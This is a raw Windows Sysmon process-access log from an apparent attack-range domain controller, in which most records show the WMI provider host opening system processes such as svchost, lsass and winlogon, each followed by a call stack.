14:10:03.837{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2B00-00000000AD01}2540C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204060Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.822{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204059Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.822{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2700-00000000AD01}3004C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204058Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.822{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8439-603E-2500-00000000AD01}2856C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204057Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.822{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8430-603E-1800-00000000AD01}1928C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204056Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.822{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1700-00000000AD01}1452C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204055Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.822{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1600-00000000AD01}1340C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204054Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.822{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204053Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.822{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1400-00000000AD01}1096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204052Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.822{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1300-00000000AD01}896C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204051Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.822{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1200-00000000AD01}392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204050Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.822{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1100-00000000AD01}620C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204049Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.822{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1000-00000000AD01}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204048Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.822{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0F00-00000000AD01}296C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204047Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.822{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0E00-00000000AD01}1012C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204046Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.822{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0D00-00000000AD01}912C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204045Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.822{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0C00-00000000AD01}852C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204044Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.822{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204043Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.822{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842D-603E-0900-00000000AD01}572C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204042Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.822{5ABCFE62-842D-603E-0B00-00000000AD01}6325384C:\Windows\system32\lsass.exe{5ABCFE62-EA3B-6040-644E-00000000AD01}3716C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204041Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 